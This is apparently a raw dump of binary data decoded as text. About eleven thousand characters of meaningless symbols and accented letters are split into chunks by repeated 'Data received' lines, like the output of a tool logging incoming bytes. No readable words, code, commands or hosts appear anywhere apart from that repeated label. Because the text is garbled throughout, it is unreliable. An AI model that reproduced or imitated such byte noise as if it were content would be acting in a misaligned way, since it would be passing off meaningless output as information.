ƒ”‡åœìÓW#*†´÷òX–Ÿõüh IxOú²@Í >¹À¼Œ®£ÒåÃl˜`š¨' ~§¨• ý.—¹³3⹀T\5âÇm_ÆÔхÌV[¬õ‘æõûMÜæC¦&kV緖¡½:Ìà0(Et”n.ê5ö&KN\A†]ž­œ"¶á¬?åL½G<?즹#•30VÛنJ¯íØ¡»^ҚÚôQ×1çÒ|ÁQ´?7®‹ÄÌÛ6»» Ï$±ojÞ+9å ïôÓ»p2©ìÑMÞXl˜ð´§ ScæúZhýªŠèÔävã&²’÷¡Ö–öÇÉFxuŸ9A‘¼s2†_Ǐ=Có¼<Žõvv7p¥|—Ó8wŒƒ­[^AQL?HIVÿ¼ÊpÚÚ ͓Æê¤æÿýh7‚íç:Ø¥7ÏÈûŸøÎ;ÃX›‰æ¶zøð‘ô6g-†Á¥°ædáóݒȘ g·vfë£D‰éñf6ì¨4TÅä·©Ý©ßëYK£:ŸTcR2zÞ!²^}ž‰ÎOä{½°õ[ŒVoî¸íOl{Uˆ¡¾ÌHaqoààStÉ ¾†T[sù€êŸ0Kÿõ±Òþ7µúiGÿ¾JÊéL)}¥gîcœ.·—ÌAöd`>WwbþÐ j8;à?«¨y#s¥V"ru¥ýז»‰+t͹´R0÷ÇUóƒrŠmj±[I ÀIp3õMÇ\"Š¸w5ܞéµ69ÁâÜ^¤hC´%Ÿwãҁná¾ù0Ë'«Áù'Bg]rõ$%!$ÿ+T™û{GxÅØ2q}¾ÚÀÆÅ؏o˜ËÒÁÏõjTžL¢ còôè]zÔG»Æı<Þ¨;]%Ë} -VêÉ©nÃaØ:³½nd)-:븋“ŒS§¢sƵUmÈÐ9ÌK‘£H„…Ý\?ŽT0Zä>a1ÂéØ ôêJÕÉUVÕIXßqÂOCºÊ}ÿ ö¢²ï.]ØJSãҖŽPäo%E¢RÑ@T+¢R×<丫¡Æ õ/ÅÒSæøEÈô²ù‡j¬ÓÝõè/—‰ãí¡ƒ¡W½/,SΛ¤Ó&ù/¢gë:H{2öX< uÃÃ]¼“­Òߣgcaôœ‹`C¯ƒÐ˜ë!tC2þ2€yŒÌ úË~§6ั¤iL¬ñ‡ÓÖx¥ñ©N‚ŒìÓKtu±àöM9֑”åf8¨Ÿcx
Data received /Øñ±p£¯„Ñzô‰¹­›ˆÄ’–‡>«v;wˆ÷M<§ ØБƒòVîÜÿìsy$EG‘“Çð+z×ñCÑêr܌²Ž:»z~*q´™ß²¢k? –d.¤1•ï¡v‹&£d;y@O ”½¦ƒ–GÞ '!ï˜E(¡,pæ˜4ÃÞuÔ9N¼`?_0P€={ê2qB4Õø·?ë ³ P‚‘öS0îF×n'ð ¹ÈûLJ¦þGB:ÿ˜A;—n–늊û9(/¾ù iÔôo0û•Ê¥¹ó¤ò[9 °S€ápª*P8›àÊ8ßAWÛ ]<€D[¾z̙֞ÛDº,›(¾Š¿÷óŠcz_dɶA_{f ©3(N]ž×&§²…6ÄÔêäáŠÙњÊ8HÁíºàˆÒ¤?=o‚(åZa«ï—¶(½›¬€,n-k€ ‹é×4K-7hp!mȧ\qm¨½×\™=ŸP¸*a~XH|­6…ÈE àTy•w*Ù\˜º«A¾GM*¶P-”´ZæÆ ¤Yû~3 |ÒN¬?*ãt±9,0÷èHäž`¦MˆÐÈLÈMV&Ïé8yé\]¦q3&4Û:hÑðªåˆc®ÿf'WC‰ n“‚ól% τn 9ÞÐ.”dÀ»_Ӓ²"ÛÝ*== Ö¯ûn:¿Îu²á&>ǼøÞ ø}¬W…7GýúÄUf¾ ð {$ٓi¾QÚÍC˜rÿ0d:fԗ™ó½—(_Öqš`McÕH÷7äë[B‚Â8±d <úœͿݗ؋ ¼ÕbNeé}>¹ÝðÿŸ %ZùP`ÿ“T:x‚8/<‹"7hßðô70z-ȩ́~<HéR-€×ûQ³û&×uÚ:üÁêiÀƒbu€Å¥?UÌpj7Ÿùf„ÞèPwIþ¿¦›"· ªy B^+„ÝÊÚ%I4ŸŽ à F¶þ[k;|ÒùÞ×̆V|8¨óŒ°Õ싶ßÚУcåA³ËjõÞ<¹Cây—é "@÷ò_‚KªÝ ;l&â"^ÏOç.©ÚÃÒyPIÍ°|{‚ÖÝÈáýø­µ7WVç[«ìiZ>Âû1›´Ù8F>ÇDÒ[Êu·ñ?UŒyM=Hn£R‚à´·p Îþÿ–^|‘4vèšI$[’NUC4×ÎuࡹÍЬäÇF‹ö§ÉÍ8ïa¯‘‰ –ûe·9lQŸsEzý•\¢Q¸}ÄåäÙ 7ã€ú±‹VJe) •_:Ùöñããx”ñÇ+(|§´ïw=c<ã~€æ™s#©zÓ`w]ÞSªK<! ¸«§˜…Ei3Ð"»Úŀ¿#›§áÓKÿ,n¼¹ŸIUs`¤¹=yœ$CƼ¦Åf¡[_š\õ1ùcƒCÊä?;jÇ{I¶oÛ° àŸ»‰·© äý¶©Oo>tžä¾M:Ï ò‚\Óðõ*[WóŒ…]ՃXõ'³ÓqYi?!Ïî×ã|ú’£:pOÿƒ2Ràܦ?¬léa:–Óa½«‹4¨—´ÓéÉÿУ§e„Ô4ðÅ);êü,x.#õhé3›Ž:²À‘ßΠΦþ\ºõŒfó 2òŸ‘㮾âƛXæßù;üLÚïqê_@‹yŒÃeViғe©(nèù4õ u{ŒT=‰ßÙ¸¯°'âÝáËғ¤€Ô—¯Ó¡KdZ¸ á ÊÞû;F%º™ë,û8!–£C
Data received KØTQíúõ9ŠuíŸR2×ܔ¤\z;‹ß-øðàsõÄÍÁ4Ô^§tù!µ­æÍ$6$_¶±à°¢WóÙ¨4}‚±7…8BÎ —µâjãÌÀ?ÀÐAꌤÏ:8+ (ŒÕÌ/S†€¹ÍITß?¿kéäê—G3­ÖCæ Έ¶!ȇ¬‹‡køð͓MM.$*. Y`z„½ÂŸiàÓs•úr­ë¹0;ÿR‰ÖïÊ#”$œìÍ#+XÁ;‰ñÞOвB/i=⮐[œm-²Ør'ÞóŒ+6£¨Ü†ŠÇ¹£ÈûÁÒôQäºA.’yçûQ:¬J)%Ì°«Jú&þÈw ŠÛÅÞUP§F5ö:%4s©t;Ô&*·_  YA¬b#eòýûg¡Faò¨~¾Ãó~)?2ª•]·sԖ>¾¸ÕÁs=ÖáÜÈFy/òÄÈ~oÖª¿m›ÏЅt6àØ+Æ8%ç/¾)!㏅Öæx ë©l†‡„6°£ž&cÁBËÖ +²1Õ6õâclç#ÆêU.fY´Z/uðÒ®…•´Hê.¬\L²ÐОw0”´S‰9¸Ûº„…~ÐìV܃ÿrÔBüä~O°§¿Y”~0¾³>éqÖö››Þ/¨—[)9¦š ƒ…@JÕ4ßæׇ~PeŽd`êñ*'„ybz³¿raÛJ`)Ép ¼+L'ļuý0ŸâƒŠ–ü|A³=æ4iou0à#¸“ü ¬cGƒO ç§õŽhk‘ŠcKøéþ%]Æ-Jžµo¸4=}Ó²þBªû†Ïk&ü“gæâQ“Âç©­¯r¹Ò‹Erz·Ñ) —ÖkhË€F€‘Ð2´. @rPDnÚôk år)¥õÿk뱈2vM{N#ච~}ôr„ä£ó3»ۄÃ`û!9ߡɬ•jÿgŒWvßü›fœ&ð¸ Ðú òôH¸QŽá "VOŬ¢„BN»V3ëÓ×ñôJ@€µð˶®×;sÏîÜÉ¡x~¶³L kIaW·¿ýµÒf=hΒâ·lH9œB \NÜ[¢¡í…bƒ™.³8¼vsM«øàîdW„„¾â0Lf>ÞÿO@‰MûArº. ™‚M*Gëüãã:ÃTÒ[+<ÔÃni¶"6°9ÁêU.ZU(Jo©üŠWZ\v 7%d­¹ß+nÂ×h€iJ@G8:8Qè=Í-œšÇè…Å“QéQ2GG'üuÁúpLí.Ì ™bÙp÷7ì#ü¡gðs–q÷¶%kŽJÊq­Ýþ5«ƒÃúç×y8«¯K}°cѯKàŸf‘›eû•¢/§û!’%þ£,l>t›75B—ÝÞ¤#¡ÃOV Š9Š½Í¡$<Ñ®d;*™ˑŒžÄ,mûbZP€E+þOzÐêÑìe¯éA^—ËÕ ào¾÷’§örzgp̊¬ê˜ÇskR€b:0¤2 tLÞ¢|¾‚ èj’õ[Õc“‚+È=…`q Íí±ªÂйƒ)‰sÇp¹ ±k:+¥[v;T¾•ÛKËËÔá;aÂ÷…»Ÿ¸Ê`5n—)5OÊM{o͂¬3ྵ Êü1l/œ[4Î7ªº üí6TVb”\UusÒ BšÒÇÕèhú˜/JúE §™mXWßp¿¬âµðf%R_1mâеŸ=oÝýèùA\Õ2ªoJ Hš¥‘ØÆct²ê2,b×?RŠÕBÄ,ÜÍ~N
Data received p¨¡Æ5ל!Qnß¿BÓðèòñéˆ:vâޗ÷Ïï@hmj‰LÆÀ`dà(k5ùu×uæԜŒ:0ŒÏ ¼1åùÔg¨Ð†Auۀ}ÜR>øžYÊÊ-ÉèGÛêj¼g®Øºà3ý1p84/i°¶Ï¬s›Xó„Ç¡åŒLëGdº/šYtAôsIŒ*õÿÅÈYxz*:Ä!²µ†û!e%€Ò/¤¨m¤Žª×¥æ` _ ëä'ÎÇ~¯„k^]>Õa™fí·]½ã>¢˜ã¨¡Ò^æäÅ:ý Òq*¹m"¶“Ý®Ÿûރ,àCÏ£Èâ±g¢ïÐ-I4M¹Ëvýl÷ÞZWõ¼z®¼ðCabö¹8êì!)„÷ÝãsHóD™½_#å+jWC2¥Á¿šk) ¯}¡f¹Ñb“6¨‹[h]Óp:rÌ)måïT:ÿâ&CÈNÀä´[¥M“ uÔ Û+Ïp> ‘²@ÞæìŽQÌքCУ^$ûoD¼ »»»®Ô_Ç)·¸ €ª; 0*µ«\„‰ªLl.f]ú"*ë“ÔfÌa8y"Ë¥šcµc?‹;Éw×GóD¶2O 5v]{¸ë…´à˔•Þr½îâÞL—¡þ^Úá: š²79ò]„ŸG ØÃ+qZÌwÐQ±[p'Ùö]"i¿‡ã«ORºY¯„]uyb»–¢ÝáB?ï êàmÄÚÄ÷¿âKLB-›ì?&æߟàë DGSl|ɟ+:/Êw"4ŅƹêzW'Z“pçMäÏKw¼q)”+ÝV‹¯°Ž>‰‚VcØÞÉ!¦ˆÿ…áwď¾´–Gú&±nÜP&qWò<ª*¾#¾6ÖؓyœdÿJ4õðS³9!2Ó+·+¾\úÛ>¢'n­Ë18i5u«°Îœéz±]MGà\¥•#%ÊBdñM̚¢]27'ë­"'ùS&i‘˳ÁpSè Ø`Z³j½Ëá°vÏhM=ǵã·wèd,d\PÕFQpEs+×6¹Y|xGeeÛö¼örh°à8¬€<ÒnkcFú!“W&/_8]€{’çîÙ_é„bwԐ×ä‡UµM­ë·…k¤šã /i(*hãA†…¢één¥±zº8IÁgڃ䇭ËUaé¡ÞZ‹Æɼ”tJòp¯¨JÖ”º£.”¤õa'Òqñ¢Wq¥ïA¥ÎáöŠ‰ä¬£½·kc—ORâ3ðü¼DP7ÏÁ Q’áR‚Jp%˜Íq»6Ý¢™%é}q3?9Îë¿øðÕÃ/|úê5^ð¥¾*]-­ÎÒö€ßBàlI&?ŽpìçÒHQ?Kû@ÀuÅ4*¸ÚÚ\×~Áèø5Ž Bão4oY_¿«è³ú²'3œË{-s/Ž'¿ìCó±éxiâ%my¾Ú2qûÐGG"ƒ fÀ j¦R}àÀ®™¢3©f¹C dò#GhÂ12p¾Œ?*I‰s'r|m“ÈDwÈ É(ž‹Mø\Ÿû»Ëí¥Ý\­‹SB„·\‚ ùÀ`©$¿ïMÏ^Š„”s•‹zµÀ«|$æ ~ÎúýMIºÛæ•6ê04ƒµo;ßêâ»N·6““Ñ5ˆ°Ú@Ø¡snÒ£Ä3r;çe[¨®6ÑØÁå_˜µõÉnœ±ÙíîLòÚ@A­¿Ši¼:ˆïâ9ƒx>ç2…èîÎM0ãa?ZLL<]6>y‚Gå¢Þ«JÔª2[ø¦K?‚†19}ŒôKô“.Š—›YJŸÀö¥´,¼9čl_à
Data received X;ÖǪLç6× tØ%c1™{Y.7
Data received ÐÒ+sÑá~'Æ¡UÁ2±WsÅmÜ#]‹SKýêFü¯b‚†™Õo7Í$"uÔqÚÑỆmÊjԏľ]N©ò´ÚŠÀÿ %Y闛Y@AHð‹Ãv¹ÕMï§zB‡H¹ù•ëçîิá—تÌ]+à&rbÙ8ÁY¾çY=;‚c™py·Üšé\oüòç3l10ÔOeÂäŽÈ[Â~zŸ}0A‡(Ã!•éÀé !/ {ÖKŒê$`µc/I؁õ1 Ë\ ~¨;§@áˆÐþ4?¨Æÿlª ó©Ð=‰Åq÷ÿà3È8*ê…Jސ§DÖ¸\U7®“û›·Ñ•E¼ËèÄ:%äÅŠÌs0ŒÐ Eyk´ª5únœá o1ìå8ÀfIŒã^z-é#ƒw3Ú*ˆh6G~Æè( a4Ï©‹Š^ˆíMFAœßºT¶/Y]_ J} ]£ ã^Ù CY1øe£sæü.#ÎFČϕR„›+(ˆý΍ám e‰çÚ¬;O`,&Æ×HB.|Ú£] #d0,/Â=º=^lCù™¯ž„žÓ«% $ÕȼАƷ~m|¿Õ¢ˆÿ¤£½#ÏHü+âw§ã6uð²ƒ0à¤b’΁̥žž™2r÷#CéïN’q‰É‹0šOÕLAì¶ñ°Ùˆ.|žib»ïVˆ‚G!ÿK‹5Zg+ĆÈöo,dû¯~÷­ŸH¤2H„È é°ǹ”¿.Ùw]m­|â Ô¼Ù `ùÏaÿhM…i;¦U‰®Žh¦œ„ljòGŒ¥»‡ý©O>Vq[eT æ(ó𳾞ÀÈU)" òK ë݉ŠW¦ù«S~;gÖ;;m2gú§D áäö²«øºÏ‹û£•"£ó+f|¼ôk²ÙfE@<ž^WòO§‰I\Þ It¥!«Ó îÕ%#6Oû²på#«Š:ÒÁà­ A!oƒ£nsÓ®fqÂé‹oŽ»^>Sq!· È0MïnÀ?-¯3þ´kØx|`äbL§Èƒáý¯fíCÏm¡ÊÐL+@;}}ç©'d¿£ÓÙDY‘y Þ5܋oñ£½êhøPãƢ՚+³ÐD}!‰vEú2¤Y Qh¯< AÝÐ×(ÇÝÞ3WʺñxÉ£ nðL à’°éBazÚÕ9;iŽa®NiKãyoæÁ?dºK£”êx™ŠÌÖs¿%Œb\ðûŒÕdlFÙ, BÈñ6‹”¢‘“÷uÒÎhâ§]¬SÁ$Ñ¿Ô~s§u{åiÅQ@¼j{9ÀQÏ0É EgˆðBBÞ³(a þC?ƒÑÁÖÇK’G %¦ó8ò­ˆŸÑÑ»'ÿÙuŽÝ>šª¿>䕪Êõ„˜$àM;θ9Ä ôŽäaû:ËJƒß´›Ûæ>«zhcV‘>´‹}Ñ`ÿ1¡Ï8ù·2œ^{Öáx¹Ï—}rp?© |?4TAqAÑoóòB0þ‚»”ÄF¼Pk ¶¡’Ř°ÜìkÑ!—°“Ây|ô³ü±Êª{®€‡¯‰ûÛrë–>© ëÖ`57¸n‘«àÚo=„¿5°V­«x]ˆ¢+ÖáWÁpjñŠ—Ô}9)­Bщƒcíp”#AÜُ¾8Àz¨¡ áÍ1©ä&ŸðDêDˆ'^Lãê*9[h£¥cëB™Ú+ºãB‡¤Z…Í«ÆN(.îÇ˵;¨?öÈêۆ†¸ê6 ÒW*Æ»
Data received d¼¿(†s`ãÿ±àû¬Æ¤ÄPA’7ó¡? âœØÆuaœ…XoO}Q" ¹Šÿ88Ö[G^s&Š“óBn§t 3±W‡ÔòÕkÊw*¤_2°ïr¥Ùö]9;.à· úv¶ÿæÀŒ¹À˜í¼VÔøèXTCßÉé5•6âÅVŒ‚†ŠLx“_c{ƺéz¶½­„„:>=ôn>Þ?5öH‰–¬<ܱfåê67ßØ5(à†–X}€QIñŒJ4ÑeRUn<äQÆV1 Ôž³ÒÆå-©T—“+ڀJ{V"?Ô;Νɞì¾ÈÛï¦;=ña@Ä[v9žàE[ ÏPć6ñçé‡æùH-´Áœ.9#„“ʒŸ€x ìOe•ÛÞwèÈîññ¥þºk ÕsË8U×òG5lzàJ¸få×ԋ6’xDäí΃Co;ÃãÊ£šõÊ|%Şò/«½]ÞòèrXµA…ññŽ36†ZÄQª5÷BÍLRH¹u¿ÖþÞyy;`v_€ÌmœŸþ¯½ÁL­M÷f¬æ·xTw´g¸~UÖ­PHIêP¬A«càɈ)¬bŗÅ+qÌótW\([ÓñۏiY†Jt™¹­7•ª«@j’Rq6 ÊyA•Ó_Í0ҖŽRˆ,£Âlm £´òG™Ñ¡Îú9s?k³`~3DøU Ö6mÄ0»çþ©ë?¼çfÜa‘øÆ'?h~f飮guû$!ãÍù6kìÉÛ>µ¢ &Ð@'{]´-N öZEûϟ eñ;¶¬—[îž|5·«ßëI+­ö¢'±äåPúǶsCBNRãWÃÅ^ò ß¼.1-k¹®IYÉ”Õ¶ª‹aÁVG¼Ëe;øK鉐¿ ç®X-´¾ÁÌë„-ôž`3w|´yÏéàd¼x¢”B†Ííl!+v!r)ãÆ«òÙõA¼j0ÇÁ”p}GÉÊ?°²²Ðx:øžÒ¢õ&»ÔJ•ÃW¿ysËr ”„FèÈIÑpžD¦o’Å;•¿ h·§÷%ÅMrþ¬“³ &eKJ`Ì<4(¤¦–æš¿¢!£6†ãÅoLÉÛû+,nª£ÌöÌÿ–ù‰Š-)ÛM™´Ðzßì°Ålž?NÔÑú3÷!Õã#UÅb¨„RsûÔÑïOÃ×R_¢9'ázÃcæ4¨}k”¬r+Œ„öbQäi«•‡¼f(sǁX÷QÛÒÀ'« êB*Üû>뚉[ú8½šd÷tj[×ðä7l`œ‚õNO gåf.âaï5qs©¿*Š0CÜ¥ D§˖]K·[nûK7Dƒò÷% b*QæIÊ#÷ËÐi½…Òuц_w(G*;_úÌ2SÇ'Ïa27À¯ñ¹Ëo±±mê…Š[x¥]®,ë¾|g­ëÃT᝶逽•a‹mÇÔfK¾ʘú³>åÄCö`kC/—à”ΘGŠ’e»v:ÕQ°˜Éâ֝­(i’%8à/ÍP Fÿ;üiOù—ñ¬té“8W¤–Ú5¸°>ÛT¥‘ù\ oZ;ßgš¯lÎLacTš2…Ÿ†h©Gýv™ÀU: …LF³¶ ­ 8{õth•jl×¼w+ª4’|‚\âIƒ{ÈÈT$ÜPzGnj&L0-ÛM²'H@FUmö°–{Sñ¥F „Hà·NÛ¥]m£ú{2ñ ŸbÄ5tïFƒõÒÖP")º0šœ{xôa¸ºœÊF×à£a¾¨Û°ÁBªÀø†-\ô•(±>aœÝ=Ùï
Data received D¸ó¶4bQ]'>2<ÉOº~8ãLû§tq@a½øÞòƒÿE³¦´äžüü `yÅ]ø
Data received 0‡îç—7Û±T‰Ñ0O°¢5m¶y[Vö.å„*$ç[ðï COSRüj ‚éö­{¼F\RÛqXìU¢í%iåèÑ,Ì Ã¬ÆXÿ]¡ô¡lè./5®;pà}tœR8­4ÿ‚ ßDq#o»)FÀÙ»†cÕäãZÜÇÈ4í ƒ:Dð–òE#Š‹æ «5xFuñìR{UÔúðòžÂïö…$yd|þ÷ú¾!ì•N`W¯™yžcþ–w\•€–³ÒNÝÈϲ mY®¹ñžðúÚ„Ì8êN ¤Þù÷GÒ-ÂCµ29”ÓÈæX¨lˆy&{&v±'ÄVQ!l$®J#†‘» ÄgN§dс92â*åæÁD^”$¬6D5ŽD$mp-¬ %`7òt‹ö‚Ó‡ÄGø“©”:Þ}Âñ—Í{ˆ•9G>ZÿÕæbú¾88S|ÏNdñ6pÀ{ËwöèЎ[ÚxÏ <:É>/¯É¦°nfÝ®$§c­Fz Ü)aqït»¯™Ú­mMÒ1%<¨þü' Ÿ]Ž©dñ|8ÚÏ ¬|d™7$*ֆ^¢,c¿ÝíÆPµŒfÉâqzÊVþHAŒ»¯öf†N9 éÐüÖå´oáZ‰Hµ,Ý‚«%3üPåòôÐ_3s‚M?~V`F­Ç•óT9RuJ@«©<ÓG&UN‹cx€ÄoÃó3sHž7bw_°°–:6"ÑVÁÊ´©b€=yLqG@Kö !¡¼ë*@Ý n[4øàWÜ 2ûL¥`¢±ä>Ï9ò¤›¶};ŒjÊRa(M Â"·zÍ4г®šOð`0ó>(Ä]ëW³^C· ç |42,¹$/ɚ!‚dwüﮏ]À¨ü‡"¯&––4ïçÂÄc¬>¹•¥ì5¨a{D`¼@“òÊ~Ҏ“cHþ›WÚR³>ÎüÎ×=º§)½XÚ(jÏa12¯jÒG™s%;Тr=ÍQ®d¼Ô4°ü2‰Žäy捈ªùÒö†é ‡¼û·ÒÇyížæý€ÉÊo/Á³‰/ÿøDZóçÔ)b£žèœ|"@••¥»Š*e¡ÂMyJ¶¶ä~h°ú؊K¬ï:Ç[˜`AÏnβ?}Q¾ÁG…ú.ìônžmP׺ԋ…ÆÞ I BÚ§fp£µ”âΖˆ¨ƒN`>MÙB6¾“ZÉUã´ §“˜ò¹Û´7L0*´èŠÂ{b±gڀX$PN³9>Ÿžå“ì›räò@ÝY-æ öú¼ÕN³×‘9Ñá[¯.í( lÙü§£Ó ÈôQ‰L?rë¶)‹¾¹n_è—xK¤¹œ‚f2‰Ùۜ.zLÇ_iÌOÿóWÞái«,šU‡r{±šÿ¿ÍJ5’·Ú¬‰ê6^$v—Ê}MÉ5íyjAs®¶§ó ä d?¤¾­ÕÕ´“; ˆ•n§TóFâ;Ø0ǓúH{… S‚N{‘Œ8‰î{"0îE¾Œ8ê7åV8aù[vMV¥C‡ Çx¸Ð$ޒ;ã#‚¨ÅÁÂFîrו¾m1ë“+ fQ®HŽG~Ž$²å µcEIÀœh-Rszø·ÖÐRފg›jg*'rT£ò´o÷«ù«ÆÜÞ`LH˜ 5fzcW¹’‹Z6f7çžòáf‘€Ž…v÷xþ¾ V4~>µµÆ<“«ËÕeX¾¶f'WG“¹’ËYðõštä²ã›œ¯k¼2ÓÀ75¾
Data received ”ë¡á "˜•0]Ð̧îxłS(z†Ó•ÞC©›ýò·xPÂg7PNò°±âр¨v2O¾ÉíÛQ¬§N)íê«++†³ñ€ê°©'¸n$¤ ەïûì“Î;6¿i¨Áq;KI²·˜%²fÎð»áoÔÀ]íðÚ¿ëŠï§‚z"k'¶‘öÄÉûDû4p‘n—PW2Cí·Æ-®Ë¢…;×6ܝeå (€dzîþïY^W–I zò#“9ö™2ªy€ÅÂôݯlšZB\?D¥Nkº›ê䉏eÀl}Ks>­S•L2Æ >uÕ°®¿&ÒQÁ*ò´F”í«(<¿žzI³‹Ô1Á϶èòD£:YJK6xbÆHTÜf€!Pï¶]•Ã:y£×ÇZ’ w×®-.ú¹É]àš»ö±žÂ©ÎVEZ}Ü@§ƒ&Y=¤ÐìJ²ÓZž!{‹¬Ìrûémó/Õâôtucõ0],I0bð^MQÊŧF¥ZM’-¬[X"´/WÌvZ¬ªq~,]_¥ZßeçŽ yؑ¶ëÙ²vꈽ{Êʲ`û%t*l~ [+ŸÖ^ñ·]9n&.îï;›DŸQ¤o+„@Ž÷Ùò—TÙí_@W>>hK@W˜ F¤Ïk*Æ#0CÙÈ,ž“ÎGÁTx>}¥)<{aÂ7VÀ…Áþs‘ñ Î'LÈ\8Vû=þâJŸ;9%ÇAÚÅ^}/!Ÿ»™‰”Ð/v›öŒé]r7N^a‘Šß—«»VBü3m±è l ÝÉõ²Dÿm•ng|»Pã•L)-Ýɒ7 ßïÂÚÅ°:(}¶Z°Ùl¬ì˜!ݱUÆ£×± Y^@‹€Ø ­$ÙU6sWxz~~…EÖç/3ß<@BôÍùqÆHÎ>ž¦%ç+ŠUQï9y¶(ºȒ+—|cÃ'ËÍn1¤Ëµ*KIí®ZŒª3ØP;ãDG–Hjà e¬bE¹—®X“êvh²Í'¹@~öa„{ ÜQ p @Dâ[-–¹ß<ÄFš7»®/€OÚ[‘ŒÊdqZ#Ð|kW`҃Ÿp¹13öe}9÷ÊiÊ·çQ ²ÎóˆseÑFʨ.q(X«RØÉÈrwP;Ó{½Wñ›±Û0 —¬L,Ü\½ ܓi‘a±}ýtN–c½äí<À5õÜaí oNšÝRYhÁ_Ñ@ÛS>>Q¨(éÚݨTTëZÊ}±5ŠsóÄWÝc«q?ŸéuëÓz·ÅÏ)Ė: ÉÃK†r‹¿:9ì=â÷ |Gšœ›#äè:Ä0"#>þI;*ª œígè¡jYuǽh ›„ R+êàîEü\šÝúi¹CV}w¢f…SçÍê黼B_X<- BDj9(†["ká:Ü‚®ÐÖ$::QSJ©ho¥$Wõtr†BØËO Qy¢ßFî¡ôÌzRÅÔ*{±Œiª¬u›Çó`u»Ay7Lšñª,ÖÞœ[¾95\ñj©nMœ«áŠDVuY¿oas¶¼~X=, sf¼Ä¼è:ÅÁ³ðjsš“æqÈí"]üéÅçÐËFî÷ãܬÎ̆FãÝ¢ f øû1-¥hÝÜ-ÛF2_SN-K¸gºˆÙŒ ÍüÎ:)E+à9iCS1/+{S^JÄiXy”ž¢Ú‚ÿê¯Pq\ªãÇâíÉê5Ï5K˜¡W¤ýÒÝ@Ày®b»90ž–4>8–(¶í%Máh£xÀß­ X˜‘?VÕrßHÚå˜Æäèó(ÄÆB
Data received D¡åVœÖ[7bßóÄý\9óA,Í0Y}¼T¨ëOÁJ¨dwË¢ØTÕ¥¼"æIm¼¢ª9?Ýí:¡–ì‚:ÈêÀq»¸Ô§¼o£A*ñLB‚
Data received 9L(w£Khîj{ã5ɪ ÃÞ»°È^Ì?Öà§agéø< ¨Üð+0 d÷¦Ó:×VÈ-SØ  §Sêt„Öû¦¶câƒU$N¯k µ€Ae0U¥Út`~—˜ÖUgðâÍ ŒêÌÛ?ªú'tÞ8±§fªòôñK[zóµþWïP1u)ò±½š¯¦>â¿ —EìO§bc4Z½Ä|â<_Æ_ÐLǵæøj½ÓÛ§$§”òšÿ\B4I T ´eqä ’Ø9ñÛÔZ­ƒN|`Εô} G*!¶`ïê/ßC°žh3<ÏbA¢ßÎs"³’))n× 3Ë]ÛK\$=àõ3F‚v-.œŽ œ¥ u›€ÅbÁ‡3B}âÛ/֛ —ºêzkdsi¿…ã[0IË7@ ¯Ýˆ|J&TÑìVÜ9tõn[^Êñæ¡á„mF¡'¨A@E(Kû,’â½?Æ2´Yù)̸$Ã×HVD¥±<[!ÀZÚrÁt-Ì \DÀžèb±ó!Ÿì¢äCVßÁs‹EˆÇé)Q¶Ö0ä׎ÐÃL ‹³K¼enN›ý£¤Qƒ=Ãd'ÒÝôT΀ô ÜJ'­¨0!C¨5U$LEiVüK7ŽÏBö!•Xl/RÛÉÎØè1ÜցÆOØn2ËeÍúÉ68½3ô]Í" P¦1 .1ÝÙÔü-N–]¢Pº´Š:·2Ó(ŽKå¯u%½´rNl¼Ì®qª iϑ ×*# 8—%U3¶°Î›DfeÔ_+VRìáý…ύ•_jä~~{2jî*/9ÞàÊÙª¡mÔÊÂm 7ÚI Až±Ó…Ê7D-#*Pöù<´œî eøD!ÐAÀr³Á ÖègŸç”‹ª/¢·ÍÜ<\ÎÈ=ØÔýÞbµ²®wвùfó"[¤Ó·šÐM ¡/öèÖ§SÓ£cñÜÕ²m¯]{9†i…¤à“WæëW/—J‹Â=êr¯Éø¤Dmú콬ól¸¹tÁ3{p9åìÞß¿ch|LôSSžLÞð+uUpò)ëCïÕm‡è‚ø[¿•X>‘Ó˜40Vº¬èz'Ñs(¬Ò%?ˆ|ütÊy²¬Üþ`¤Ô¨„vjùzÃÇmX÷h'‡+„ÈMp«uKümz¿ùh³”íB á~O"­²×nßQ ¯VmI5w–T$MþþʜÒsBk[Î{ü'…ÒÒã¦0õs§ºšé4 Qe{è ªyÄÁ:™k$¸ÂXéB:ò*kÊÁ@Ò×ÍàXÃÔ¢£.ÄhG3`½ƒ5ú£ÁGU`b2¨mk±98rÊtÔ,P)ýiÖ^O~¥^hAáuÿ».5§„˜¼à2kŽíN½m|LëŠil­‰—¬Ó(Î΢ <s¶!¶oèz=BY')ÇoŒáD\: Ûq‹„ÔÐtâYë7uÞò‹ÜEޜk÷)ˆå|Càå(Ÿ„¿1 ¼KK’”Üw2i k;\…q :ºÜ³‰XmrŠôõc®©2¦pŸB1;‘E°s¯`tc¼#ꮶÜ[ ks¯†|&@ Àêïe»ÿ2za®þÔÛ?—!6A—¹e’VbrϸˆÞè+¡ã±ŠvиPF²¸ˆñzkW5Z‰)qR°[MzˆÐLа¥ Š3_.
Data received F2ù¦ç\f»€Â-á¦ý\×Ѷ°«cêþ-Ža®ªØ·†ùhޔUYøeGT,Bi©x’©²øqI¿Üéza77Cò)Ì‚Ó ò<š©»#ýÀt_U 8Ï#EAQ/BÑyÒZlj1;¼|žåTNž*¸÷qf’ïÇJØwbm]­:ú"M™;¦éƒÂÇõcÒw‰¹Õ4œŒÃ×ÙàÏ(¸FÌuNê‰Óû]ü¬!L—4>æ#ãQ1Xèô,­Ú]iÄp8z¤ ðõÌv« »û䈨T´³›û=•:ÉøÇÓl¡§†19ccjm¾,“ëMÖÛæ>ГJ܁I{ŽwW¼>‰C~KC£6ú°Sþ ˜;Œþ@ÎqM(\˜ò?؈oË”zW÷ké–x˜ÍHì¼¼ϑ‹Obþ“Hì¨Ößj¤Î1¦þÐôQ«¹—Ÿ'®3­R*¡²Q–ªÀÒ°Ɖ« )ò ˜Gô1]læAæT}‚ÿ™xÐ¤†38=|@£Ð*(µé Ó qœÓÁûðÔtBe»…‡‹ß4$"W>"ù& û½„Ëψ™³ƒ´9íW²mÔÐí$» jó-:D}$j0“_ú*,W‡/<R¢u‹Ð—ò֘K¬•SÓÏxå´ÄI LÞ{&ØWŊ„FëôÌDØM{{ÖÀaô¢UDÛ/<~ØáAÀu’ŽÅþÇ_jMÔ÷¶¢Ã3’ }õolŸŸ@¸ë~PÏë}Ÿ žóå(Ë E3c§³Q4šÚƒt8ŽÎoT”.ùdž X<'äFoÍôb#}$ÀãWÜQXE¹’ž²ôÀ.(Åþ€¥KÄ{G‘Ï>J-š=:Vô>=€í’>l/Ӟ´÷I¨C!+èäê9zƒŸ.³Ò‹]ïùBFâðf…IÒ&‚å¼J8úõŒŠá ª¨P$Cû eÓrŒ¢ 